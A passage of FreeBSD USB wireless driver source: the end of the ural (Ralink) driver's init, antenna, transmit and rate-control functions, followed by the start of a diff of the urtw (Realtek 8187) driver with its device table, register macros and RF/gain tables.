ural_set_macaddr(struct ural_softc *sc, uint8_t *addr) { uint16_t tmp; tmp = addr[0] | addr[1] << 8; ural_write(sc, RAL_MAC_CSR2, tmp); tmp = addr[2] | addr[3] << 8; ural_write(sc, RAL_MAC_CSR3, tmp); tmp = addr[4] | addr[5] << 8; ural_write(sc, RAL_MAC_CSR4, tmp); DPRINTF("setting MAC address to %6D\n", addr, ":"); } static void ural_setpromisc(struct ural_softc *sc) { struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; tmp = ural_read(sc, RAL_TXRX_CSR2); tmp &= ~RAL_DROP_NOT_TO_ME; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RAL_DROP_NOT_TO_ME; ural_write(sc, RAL_TXRX_CSR2, tmp); DPRINTF("%s promiscuous mode\n", (ifp->if_flags & IFF_PROMISC) ? 
"entering" : "leaving"); } static void ural_update_promisc(struct ifnet *ifp) { struct ural_softc *sc = ifp->if_softc; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; RAL_LOCK(sc); ural_setpromisc(sc); RAL_UNLOCK(sc); } static const char * ural_get_rf(int rev) { switch (rev) { case RAL_RF_2522: return "RT2522"; case RAL_RF_2523: return "RT2523"; case RAL_RF_2524: return "RT2524"; case RAL_RF_2525: return "RT2525"; case RAL_RF_2525E: return "RT2525e"; case RAL_RF_2526: return "RT2526"; case RAL_RF_5222: return "RT5222"; default: return "unknown"; } } static void ural_read_eeprom(struct ural_softc *sc) { uint16_t val; ural_eeprom_read(sc, RAL_EEPROM_CONFIG0, &val, 2); val = le16toh(val); sc->rf_rev = (val >> 11) & 0x7; sc->hw_radio = (val >> 10) & 0x1; sc->led_mode = (val >> 6) & 0x7; sc->rx_ant = (val >> 4) & 0x3; sc->tx_ant = (val >> 2) & 0x3; sc->nb_ant = val & 0x3; /* read MAC address */ ural_eeprom_read(sc, RAL_EEPROM_ADDRESS, sc->sc_bssid, 6); /* read default values for BBP registers */ ural_eeprom_read(sc, RAL_EEPROM_BBP_BASE, sc->bbp_prom, 2 * 16); /* read Tx power for all b/g channels */ ural_eeprom_read(sc, RAL_EEPROM_TXPOWER, sc->txpow, 14); } static int ural_bbp_init(struct ural_softc *sc) { #define N(a) ((int)(sizeof (a) / sizeof ((a)[0]))) int i, ntries; /* wait for BBP to be ready */ for (ntries = 0; ntries < 100; ntries++) { if (ural_bbp_read(sc, RAL_BBP_VERSION) != 0) break; if (ural_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for BBP\n"); return EIO; } /* initialize BBP registers to default values */ for (i = 0; i < N(ural_def_bbp); i++) ural_bbp_write(sc, ural_def_bbp[i].reg, ural_def_bbp[i].val); #if 0 /* initialize BBP registers to values stored in EEPROM */ for (i = 0; i < 16; i++) { if (sc->bbp_prom[i].reg == 0xff) continue; ural_bbp_write(sc, sc->bbp_prom[i].reg, sc->bbp_prom[i].val); } #endif return 0; #undef N } static void ural_set_txantenna(struct ural_softc *sc, int antenna) { uint16_t tmp; uint8_t tx; tx = ural_bbp_read(sc, RAL_BBP_TX) & ~RAL_BBP_ANTMASK; if (antenna == 1) tx |= RAL_BBP_ANTA; else if (antenna == 2) tx |= RAL_BBP_ANTB; else tx |= RAL_BBP_DIVERSITY; /* need to force I/Q flip for RF 2525e, 2526 and 5222 */ if (sc->rf_rev == RAL_RF_2525E || sc->rf_rev == RAL_RF_2526 || sc->rf_rev == RAL_RF_5222) tx |= RAL_BBP_FLIPIQ; ural_bbp_write(sc, RAL_BBP_TX, tx); /* update values in PHY_CSR5 and PHY_CSR6 */ tmp = ural_read(sc, RAL_PHY_CSR5) & ~0x7; ural_write(sc, RAL_PHY_CSR5, tmp | (tx & 0x7)); tmp = ural_read(sc, RAL_PHY_CSR6) & ~0x7; ural_write(sc, RAL_PHY_CSR6, tmp | (tx & 0x7)); } static void ural_set_rxantenna(struct ural_softc *sc, int antenna) { uint8_t rx; rx = ural_bbp_read(sc, RAL_BBP_RX) & ~RAL_BBP_ANTMASK; if (antenna == 1) rx |= RAL_BBP_ANTA; else if (antenna == 2) rx |= RAL_BBP_ANTB; else rx |= RAL_BBP_DIVERSITY; /* need to force no I/Q flip for RF 2525e and 2526 */ if (sc->rf_rev == RAL_RF_2525E || sc->rf_rev == RAL_RF_2526) rx &= ~RAL_BBP_FLIPIQ; ural_bbp_write(sc, RAL_BBP_RX, rx); } static void ural_init_locked(struct ural_softc *sc) { #define N(a) ((int)(sizeof (a) / sizeof ((a)[0]))) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t tmp; int i, ntries; RAL_LOCK_ASSERT(sc, MA_OWNED); ural_set_testmode(sc); ural_write(sc, 0x308, 0x00f0); /* XXX magic */ ural_stop(sc); /* initialize MAC registers to default values */ for (i = 0; i < N(ural_def_mac); i++) ural_write(sc, ural_def_mac[i].reg, ural_def_mac[i].val); /* wait for BBP and RF to wake up (this can 
take a long time!) */ for (ntries = 0; ntries < 100; ntries++) { tmp = ural_read(sc, RAL_MAC_CSR17); if ((tmp & (RAL_BBP_AWAKE | RAL_RF_AWAKE)) == (RAL_BBP_AWAKE | RAL_RF_AWAKE)) break; if (ural_pause(sc, hz / 100)) break; } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for BBP/RF to wakeup\n"); goto fail; } /* we're ready! */ ural_write(sc, RAL_MAC_CSR1, RAL_HOST_READY); /* set basic rate set (will be updated later) */ ural_write(sc, RAL_TXRX_CSR11, 0x15f); if (ural_bbp_init(sc) != 0) goto fail; ural_set_chan(sc, ic->ic_curchan); /* clear statistic registers (STA_CSR0 to STA_CSR10) */ ural_read_multi(sc, RAL_STA_CSR0, sc->sta, sizeof sc->sta); ural_set_txantenna(sc, sc->tx_ant); ural_set_rxantenna(sc, sc->rx_ant); ural_set_macaddr(sc, IF_LLADDR(ifp)); /* * Allocate Tx and Rx xfer queues. */ ural_setup_tx_list(sc); /* kick Rx */ tmp = RAL_DROP_PHY | RAL_DROP_CRC; if (ic->ic_opmode != IEEE80211_M_MONITOR) { tmp |= RAL_DROP_CTL | RAL_DROP_BAD_VERSION; if (ic->ic_opmode != IEEE80211_M_HOSTAP) tmp |= RAL_DROP_TODS; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RAL_DROP_NOT_TO_ME; } ural_write(sc, RAL_TXRX_CSR2, tmp); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; usbd_xfer_set_stall(sc->sc_xfer[URAL_BULK_WR]); usbd_transfer_start(sc->sc_xfer[URAL_BULK_RD]); return; fail: ural_stop(sc); #undef N } static void ural_init(void *priv) { struct ural_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; RAL_LOCK(sc); ural_init_locked(sc); RAL_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void ural_stop(struct ural_softc *sc) { struct ifnet *ifp = sc->sc_ifp; RAL_LOCK_ASSERT(sc, MA_OWNED); ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); /* * Drain all the transfers, if not already drained: */ RAL_UNLOCK(sc); usbd_transfer_drain(sc->sc_xfer[URAL_BULK_WR]); usbd_transfer_drain(sc->sc_xfer[URAL_BULK_RD]); RAL_LOCK(sc); ural_unsetup_tx_list(sc); /* disable Rx */ ural_write(sc, RAL_TXRX_CSR2, RAL_DISABLE_RX); /* reset ASIC and BBP (but won't reset MAC registers!) */ ural_write(sc, RAL_MAC_CSR1, RAL_RESET_ASIC | RAL_RESET_BBP); /* wait a little */ ural_pause(sc, hz / 10); ural_write(sc, RAL_MAC_CSR1, 0); /* wait a little */ ural_pause(sc, hz / 10); } static int ural_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct ural_softc *sc = ifp->if_softc; RAL_LOCK(sc); /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { RAL_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } if (sc->tx_nfree < RAL_TX_MINFREE) { ifp->if_drv_flags |= IFF_DRV_OACTIVE; RAL_UNLOCK(sc); m_freem(m); ieee80211_free_node(ni); return EIO; } ifp->if_opackets++; if (params == NULL) { /* * Legacy path; interpret frame contents to decide * precisely how to send the frame. */ if (ural_tx_mgt(sc, m, ni) != 0) goto bad; } else { /* * Caller supplied explicit parameters to use in * sending the frame. 
*/ if (ural_tx_raw(sc, m, ni, params) != 0) goto bad; } RAL_UNLOCK(sc); return 0; bad: ifp->if_oerrors++; RAL_UNLOCK(sc); ieee80211_free_node(ni); return EIO; /* XXX */ } static void ural_ratectl_start(struct ural_softc *sc, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ural_vap *uvp = URAL_VAP(vap); /* clear statistic registers (STA_CSR0 to STA_CSR10) */ ural_read_multi(sc, RAL_STA_CSR0, sc->sta, sizeof sc->sta); usb_callout_reset(&uvp->ratectl_ch, hz, ural_ratectl_timeout, uvp); } static void ural_ratectl_timeout(void *arg) { struct ural_vap *uvp = arg; struct ieee80211vap *vap = &uvp->vap; struct ieee80211com *ic = vap->iv_ic; ieee80211_runtask(ic, &uvp->ratectl_task); } static void ural_ratectl_task(void *arg, int pending) { struct ural_vap *uvp = arg; struct ieee80211vap *vap = &uvp->vap; struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct ural_softc *sc = ifp->if_softc; struct ieee80211_node *ni; int ok, fail; int sum, retrycnt; ni = ieee80211_ref_node(vap->iv_bss); RAL_LOCK(sc); /* read and clear statistic registers (STA_CSR0 to STA_CSR10) */ ural_read_multi(sc, RAL_STA_CSR0, sc->sta, sizeof(sc->sta)); ok = sc->sta[7] + /* TX ok w/o retry */ sc->sta[8]; /* TX ok w/ retry */ fail = sc->sta[9]; /* TX retry-fail count */ sum = ok+fail; retrycnt = sc->sta[8] + fail; ieee80211_ratectl_tx_update(vap, ni, &sum, &ok, &retrycnt); (void) ieee80211_ratectl_rate(ni, NULL, 0); ifp->if_oerrors += fail; /* count TX retry-fail as Tx errors */ usb_callout_reset(&uvp->ratectl_ch, hz, ural_ratectl_timeout, uvp); RAL_UNLOCK(sc); ieee80211_free_node(ni); } static int ural_pause(struct ural_softc *sc, int timeout) { usb_pause_mtx(&sc->sc_mtx, timeout); return (0); } diff --git a/sys/dev/usb/wlan/if_urtw.c b/sys/dev/usb/wlan/if_urtw.c index aadc74ce507f..a5516339fb41 100644 --- a/sys/dev/usb/wlan/if_urtw.c +++ b/sys/dev/usb/wlan/if_urtw.c @@ -1,4483 +1,4483 @@ /*- * Copyright (c) 2008 Weongyo Jeong * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 
*/ #include __FBSDID("$FreeBSD$"); #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef INET #include #include #include #include #include #endif #include #include #include #include #include #include "usbdevs.h" #include #include static SYSCTL_NODE(_hw_usb, OID_AUTO, urtw, CTLFLAG_RW, 0, "USB Realtek 8187L"); #ifdef URTW_DEBUG int urtw_debug = 0; SYSCTL_INT(_hw_usb_urtw, OID_AUTO, debug, CTLFLAG_RW | CTLFLAG_TUN, &urtw_debug, 0, "control debugging printfs"); TUNABLE_INT("hw.usb.urtw.debug", &urtw_debug); enum { URTW_DEBUG_XMIT = 0x00000001, /* basic xmit operation */ URTW_DEBUG_RECV = 0x00000002, /* basic recv operation */ URTW_DEBUG_RESET = 0x00000004, /* reset processing */ URTW_DEBUG_TX_PROC = 0x00000008, /* tx ISR proc */ URTW_DEBUG_RX_PROC = 0x00000010, /* rx ISR proc */ URTW_DEBUG_STATE = 0x00000020, /* 802.11 state transitions */ URTW_DEBUG_STAT = 0x00000040, /* statistic */ URTW_DEBUG_INIT = 0x00000080, /* initialization of dev */ URTW_DEBUG_TXSTATUS = 0x00000100, /* tx status */ URTW_DEBUG_ANY = 0xffffffff }; #define DPRINTF(sc, m, fmt, ...) do { \ if (sc->sc_debug & (m)) \ printf(fmt, __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, m, fmt, ...) do { \ (void) sc; \ } while (0) #endif static int urtw_preamble_mode = URTW_PREAMBLE_MODE_LONG; SYSCTL_INT(_hw_usb_urtw, OID_AUTO, preamble_mode, CTLFLAG_RW | CTLFLAG_TUN, &urtw_preamble_mode, 0, "set the preable mode (long or short)"); TUNABLE_INT("hw.usb.urtw.preamble_mode", &urtw_preamble_mode); /* recognized device vendors/products */ #define urtw_lookup(v, p) \ ((const struct urtw_type *)usb_lookup(urtw_devs, v, p)) #define URTW_DEV_B(v,p) \ { USB_VPI(USB_VENDOR_##v, USB_PRODUCT_##v##_##p, URTW_REV_RTL8187B) } #define URTW_DEV_L(v,p) \ { USB_VPI(USB_VENDOR_##v, USB_PRODUCT_##v##_##p, URTW_REV_RTL8187L) } #define URTW_REV_RTL8187B 0 #define URTW_REV_RTL8187L 1 static const STRUCT_USB_HOST_ID urtw_devs[] = { URTW_DEV_B(NETGEAR, WG111V3), URTW_DEV_B(REALTEK, RTL8187B_0), URTW_DEV_B(REALTEK, RTL8187B_1), URTW_DEV_B(REALTEK, RTL8187B_2), URTW_DEV_B(SITECOMEU, WL168V4), URTW_DEV_L(ASUS, P5B_WIFI), URTW_DEV_L(BELKIN, F5D7050E), URTW_DEV_L(LINKSYS4, WUSB54GCV2), URTW_DEV_L(NETGEAR, WG111V2), URTW_DEV_L(REALTEK, RTL8187), URTW_DEV_L(SITECOMEU, WL168V1), URTW_DEV_L(SURECOM, EP9001G2A), { USB_VPI(USB_VENDOR_OVISLINK, 0x8187, URTW_REV_RTL8187L) }, { USB_VPI(USB_VENDOR_DICKSMITH, 0x9401, URTW_REV_RTL8187L) }, { USB_VPI(USB_VENDOR_HP, 0xca02, URTW_REV_RTL8187L) }, { USB_VPI(USB_VENDOR_LOGITEC, 0x010c, URTW_REV_RTL8187L) }, { USB_VPI(USB_VENDOR_NETGEAR, 0x6100, URTW_REV_RTL8187L) }, { USB_VPI(USB_VENDOR_SPHAIRON, 0x0150, URTW_REV_RTL8187L) }, { USB_VPI(USB_VENDOR_QCOM, 0x6232, URTW_REV_RTL8187L) }, #undef URTW_DEV_L #undef URTW_DEV_B }; #define urtw_read8_m(sc, val, data) do { \ error = urtw_read8_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_write8_m(sc, val, data) do { \ error = urtw_write8_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_read16_m(sc, val, data) do { \ error = urtw_read16_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_write16_m(sc, val, data) do { \ error = urtw_write16_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_read32_m(sc, val, data) do { \ error = urtw_read32_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define 
urtw_write32_m(sc, val, data) do { \ error = urtw_write32_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_8187_write_phy_ofdm(sc, val, data) do { \ error = urtw_8187_write_phy_ofdm_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_8187_write_phy_cck(sc, val, data) do { \ error = urtw_8187_write_phy_cck_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) #define urtw_8225_write(sc, val, data) do { \ error = urtw_8225_write_c(sc, val, data); \ if (error != 0) \ goto fail; \ } while (0) struct urtw_pair { uint32_t reg; uint32_t val; }; static uint8_t urtw_8225_agc[] = { 0x9e, 0x9e, 0x9e, 0x9e, 0x9e, 0x9e, 0x9e, 0x9e, 0x9d, 0x9c, 0x9b, 0x9a, 0x99, 0x98, 0x97, 0x96, 0x95, 0x94, 0x93, 0x92, 0x91, 0x90, 0x8f, 0x8e, 0x8d, 0x8c, 0x8b, 0x8a, 0x89, 0x88, 0x87, 0x86, 0x85, 0x84, 0x83, 0x82, 0x81, 0x80, 0x3f, 0x3e, 0x3d, 0x3c, 0x3b, 0x3a, 0x39, 0x38, 0x37, 0x36, 0x35, 0x34, 0x33, 0x32, 0x31, 0x30, 0x2f, 0x2e, 0x2d, 0x2c, 0x2b, 0x2a, 0x29, 0x28, 0x27, 0x26, 0x25, 0x24, 0x23, 0x22, 0x21, 0x20, 0x1f, 0x1e, 0x1d, 0x1c, 0x1b, 0x1a, 0x19, 0x18, 0x17, 0x16, 0x15, 0x14, 0x13, 0x12, 0x11, 0x10, 0x0f, 0x0e, 0x0d, 0x0c, 0x0b, 0x0a, 0x09, 0x08, 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01 }; static uint8_t urtw_8225z2_agc[] = { 0x5e, 0x5e, 0x5e, 0x5e, 0x5d, 0x5b, 0x59, 0x57, 0x55, 0x53, 0x51, 0x4f, 0x4d, 0x4b, 0x49, 0x47, 0x45, 0x43, 0x41, 0x3f, 0x3d, 0x3b, 0x39, 0x37, 0x35, 0x33, 0x31, 0x2f, 0x2d, 0x2b, 0x29, 0x27, 0x25, 0x23, 0x21, 0x1f, 0x1d, 0x1b, 0x19, 0x17, 0x15, 0x13, 0x11, 0x0f, 0x0d, 0x0b, 0x09, 0x07, 0x05, 0x03, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x19, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x26, 0x27, 0x27, 0x28, 0x28, 0x29, 0x2a, 0x2a, 0x2a, 0x2b, 0x2b, 0x2b, 0x2c, 0x2c, 0x2c, 0x2d, 0x2d, 0x2d, 0x2d, 0x2e, 0x2e, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x30, 0x30, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31 }; static uint32_t urtw_8225_channel[] = { 0x0000, /* dummy channel 0 */ 0x085c, /* 1 */ 0x08dc, /* 2 */ 0x095c, /* 3 */ 0x09dc, /* 4 */ 0x0a5c, /* 5 */ 0x0adc, /* 6 */ 0x0b5c, /* 7 */ 0x0bdc, /* 8 */ 0x0c5c, /* 9 */ 0x0cdc, /* 10 */ 0x0d5c, /* 11 */ 0x0ddc, /* 12 */ 0x0e5c, /* 13 */ 0x0f72, /* 14 */ }; static uint8_t urtw_8225_gain[] = { 0x23, 0x88, 0x7c, 0xa5, /* -82dbm */ 0x23, 0x88, 0x7c, 0xb5, /* -82dbm */ 0x23, 0x88, 0x7c, 0xc5, /* -82dbm */ 0x33, 0x80, 0x79, 0xc5, /* -78dbm */ 0x43, 0x78, 0x76, 0xc5, /* -74dbm */ 0x53, 0x60, 0x73, 0xc5, /* -70dbm */ 0x63, 0x58, 0x70, 0xc5, /* -66dbm */ }; static struct urtw_pair urtw_8225_rf_part1[] = { { 0x00, 0x0067 }, { 0x01, 0x0fe0 }, { 0x02, 0x044d }, { 0x03, 0x0441 }, { 0x04, 0x0486 }, { 0x05, 0x0bc0 }, { 0x06, 0x0ae6 }, { 0x07, 0x082a }, { 0x08, 0x001f }, { 0x09, 0x0334 }, { 0x0a, 0x0fd4 }, { 0x0b, 0x0391 }, { 0x0c, 0x0050 }, { 0x0d, 0x06db }, { 0x0e, 0x0029 }, { 0x0f, 0x0914 }, }; static struct urtw_pair urtw_8225_rf_part2[] = { { 0x00, 0x01 }, { 0x01, 0x02 }, { 0x02, 0x42 }, { 0x03, 0x00 }, { 0x04, 0x00 }, { 0x05, 0x00 }, { 0x06, 0x40 }, { 0x07, 0x00 }, { 0x08, 0x40 }, { 0x09, 0xfe }, { 0x0a, 0x09 }, { 0x0b, 0x80 }, { 0x0c, 0x01 }, { 0x0e, 0xd3 }, { 0x0f, 0x38 }, { 0x10, 0x84 }, { 0x11, 0x06 }, { 0x12, 0x20 }, { 0x13, 0x20 }, { 0x14, 0x00 }, { 0x15, 0x40 }, { 0x16, 0x00 
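/*
 * Editorial sketch (not part of this diff): the urtw_read*_m()/urtw_write*_m()
 * macros above wrap the *_c() accessors and jump to a local "fail:" label on
 * error, which is why most routines in this driver declare "usb_error_t error"
 * and end with a fail: label.  The same pattern in isolation, with
 * hypothetical names:
 */
#include <stdint.h>

static int
sketch_write8(void *dev, int reg, uint8_t val)
{
	(void)dev; (void)reg; (void)val;
	return (0);		/* stand-in for a USB register write */
}

#define SKETCH_WRITE8(dev, reg, val) do {		\
	error = sketch_write8(dev, reg, val);		\
	if (error != 0)					\
		goto fail;				\
} while (0)

static int
sketch_setup(void *dev)
{
	int error;

	SKETCH_WRITE8(dev, 0x00, 0x01);	/* each step bails to fail: on error */
	SKETCH_WRITE8(dev, 0x01, 0x02);
fail:
	return (error);
}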
}, { 0x17, 0x40 }, { 0x18, 0xef }, { 0x19, 0x19 }, { 0x1a, 0x20 }, { 0x1b, 0x76 }, { 0x1c, 0x04 }, { 0x1e, 0x95 }, { 0x1f, 0x75 }, { 0x20, 0x1f }, { 0x21, 0x27 }, { 0x22, 0x16 }, { 0x24, 0x46 }, { 0x25, 0x20 }, { 0x26, 0x90 }, { 0x27, 0x88 } }; static struct urtw_pair urtw_8225_rf_part3[] = { { 0x00, 0x98 }, { 0x03, 0x20 }, { 0x04, 0x7e }, { 0x05, 0x12 }, { 0x06, 0xfc }, { 0x07, 0x78 }, { 0x08, 0x2e }, { 0x10, 0x9b }, { 0x11, 0x88 }, { 0x12, 0x47 }, { 0x13, 0xd0 }, { 0x19, 0x00 }, { 0x1a, 0xa0 }, { 0x1b, 0x08 }, { 0x40, 0x86 }, { 0x41, 0x8d }, { 0x42, 0x15 }, { 0x43, 0x18 }, { 0x44, 0x1f }, { 0x45, 0x1e }, { 0x46, 0x1a }, { 0x47, 0x15 }, { 0x48, 0x10 }, { 0x49, 0x0a }, { 0x4a, 0x05 }, { 0x4b, 0x02 }, { 0x4c, 0x05 } }; static uint16_t urtw_8225_rxgain[] = { 0x0400, 0x0401, 0x0402, 0x0403, 0x0404, 0x0405, 0x0408, 0x0409, 0x040a, 0x040b, 0x0502, 0x0503, 0x0504, 0x0505, 0x0540, 0x0541, 0x0542, 0x0543, 0x0544, 0x0545, 0x0580, 0x0581, 0x0582, 0x0583, 0x0584, 0x0585, 0x0588, 0x0589, 0x058a, 0x058b, 0x0643, 0x0644, 0x0645, 0x0680, 0x0681, 0x0682, 0x0683, 0x0684, 0x0685, 0x0688, 0x0689, 0x068a, 0x068b, 0x068c, 0x0742, 0x0743, 0x0744, 0x0745, 0x0780, 0x0781, 0x0782, 0x0783, 0x0784, 0x0785, 0x0788, 0x0789, 0x078a, 0x078b, 0x078c, 0x078d, 0x0790, 0x0791, 0x0792, 0x0793, 0x0794, 0x0795, 0x0798, 0x0799, 0x079a, 0x079b, 0x079c, 0x079d, 0x07a0, 0x07a1, 0x07a2, 0x07a3, 0x07a4, 0x07a5, 0x07a8, 0x07a9, 0x07aa, 0x07ab, 0x07ac, 0x07ad, 0x07b0, 0x07b1, 0x07b2, 0x07b3, 0x07b4, 0x07b5, 0x07b8, 0x07b9, 0x07ba, 0x07bb, 0x07bb }; static uint8_t urtw_8225_threshold[] = { 0x8d, 0x8d, 0x8d, 0x8d, 0x9d, 0xad, 0xbd, }; static uint8_t urtw_8225_tx_gain_cck_ofdm[] = { 0x02, 0x06, 0x0e, 0x1e, 0x3e, 0x7e }; static uint8_t urtw_8225_txpwr_cck[] = { 0x18, 0x17, 0x15, 0x11, 0x0c, 0x08, 0x04, 0x02, 0x1b, 0x1a, 0x17, 0x13, 0x0e, 0x09, 0x04, 0x02, 0x1f, 0x1e, 0x1a, 0x15, 0x10, 0x0a, 0x05, 0x02, 0x22, 0x21, 0x1d, 0x18, 0x11, 0x0b, 0x06, 0x02, 0x26, 0x25, 0x21, 0x1b, 0x14, 0x0d, 0x06, 0x03, 0x2b, 0x2a, 0x25, 0x1e, 0x16, 0x0e, 0x07, 0x03 }; static uint8_t urtw_8225_txpwr_cck_ch14[] = { 0x18, 0x17, 0x15, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x1b, 0x1a, 0x17, 0x0e, 0x00, 0x00, 0x00, 0x00, 0x1f, 0x1e, 0x1a, 0x0f, 0x00, 0x00, 0x00, 0x00, 0x22, 0x21, 0x1d, 0x11, 0x00, 0x00, 0x00, 0x00, 0x26, 0x25, 0x21, 0x13, 0x00, 0x00, 0x00, 0x00, 0x2b, 0x2a, 0x25, 0x15, 0x00, 0x00, 0x00, 0x00 }; static uint8_t urtw_8225_txpwr_ofdm[]={ 0x80, 0x90, 0xa2, 0xb5, 0xcb, 0xe4 }; static uint8_t urtw_8225v2_gain_bg[]={ 0x23, 0x15, 0xa5, /* -82-1dbm */ 0x23, 0x15, 0xb5, /* -82-2dbm */ 0x23, 0x15, 0xc5, /* -82-3dbm */ 0x33, 0x15, 0xc5, /* -78dbm */ 0x43, 0x15, 0xc5, /* -74dbm */ 0x53, 0x15, 0xc5, /* -70dbm */ 0x63, 0x15, 0xc5, /* -66dbm */ }; static struct urtw_pair urtw_8225v2_rf_part1[] = { { 0x00, 0x02bf }, { 0x01, 0x0ee0 }, { 0x02, 0x044d }, { 0x03, 0x0441 }, { 0x04, 0x08c3 }, { 0x05, 0x0c72 }, { 0x06, 0x00e6 }, { 0x07, 0x082a }, { 0x08, 0x003f }, { 0x09, 0x0335 }, { 0x0a, 0x09d4 }, { 0x0b, 0x07bb }, { 0x0c, 0x0850 }, { 0x0d, 0x0cdf }, { 0x0e, 0x002b }, { 0x0f, 0x0114 } }; static struct urtw_pair urtw_8225v2b_rf_part0[] = { { 0x00, 0x00b7 }, { 0x01, 0x0ee0 }, { 0x02, 0x044d }, { 0x03, 0x0441 }, { 0x04, 0x08c3 }, { 0x05, 0x0c72 }, { 0x06, 0x00e6 }, { 0x07, 0x082a }, { 0x08, 0x003f }, { 0x09, 0x0335 }, { 0x0a, 0x09d4 }, { 0x0b, 0x07bb }, { 0x0c, 0x0850 }, { 0x0d, 0x0cdf }, { 0x0e, 0x002b }, { 0x0f, 0x0114 } }; static struct urtw_pair urtw_8225v2b_rf_part1[] = { {0x0f0, 0x32}, {0x0f1, 0x32}, {0x0f2, 0x00}, {0x0f3, 0x00}, {0x0f4, 0x32}, {0x0f5, 0x43}, {0x0f6, 0x00}, 
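/*
 * Editorial sketch (not part of this diff): the struct urtw_pair tables above
 * pair an RF/BBP register with the value to program into it.  A table of that
 * shape can be applied with a loop like the one below; the callback, names and
 * types are hypothetical, not driver code.
 */
#include <stdint.h>

struct sketch_pair {		/* mirrors struct urtw_pair above */
	uint32_t reg;
	uint32_t val;
};

static int
sketch_load_pairs(const struct sketch_pair *p, int n,
    int (*write_reg)(void *arg, uint32_t reg, uint32_t val), void *arg)
{
	int i, error;

	for (i = 0; i < n; i++) {
		error = write_reg(arg, p[i].reg, p[i].val);
		if (error != 0)
			return (error);	/* stop at the first failed write */
	}
	return (0);
}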
{0x0f7, 0x00}, {0x0f8, 0x46}, {0x0f9, 0xa4}, {0x0fa, 0x00}, {0x0fb, 0x00}, {0x0fc, 0x96}, {0x0fd, 0xa4}, {0x0fe, 0x00}, {0x0ff, 0x00}, {0x158, 0x4b}, {0x159, 0x00}, {0x15a, 0x4b}, {0x15b, 0x00}, {0x160, 0x4b}, {0x161, 0x09}, {0x162, 0x4b}, {0x163, 0x09}, {0x1ce, 0x0f}, {0x1cf, 0x00}, {0x1e0, 0xff}, {0x1e1, 0x0f}, {0x1e2, 0x00}, {0x1f0, 0x4e}, {0x1f1, 0x01}, {0x1f2, 0x02}, {0x1f3, 0x03}, {0x1f4, 0x04}, {0x1f5, 0x05}, {0x1f6, 0x06}, {0x1f7, 0x07}, {0x1f8, 0x08}, {0x24e, 0x00}, {0x20c, 0x04}, {0x221, 0x61}, {0x222, 0x68}, {0x223, 0x6f}, {0x224, 0x76}, {0x225, 0x7d}, {0x226, 0x84}, {0x227, 0x8d}, {0x24d, 0x08}, {0x250, 0x05}, {0x251, 0xf5}, {0x252, 0x04}, {0x253, 0xa0}, {0x254, 0x1f}, {0x255, 0x23}, {0x256, 0x45}, {0x257, 0x67}, {0x258, 0x08}, {0x259, 0x08}, {0x25a, 0x08}, {0x25b, 0x08}, {0x260, 0x08}, {0x261, 0x08}, {0x262, 0x08}, {0x263, 0x08}, {0x264, 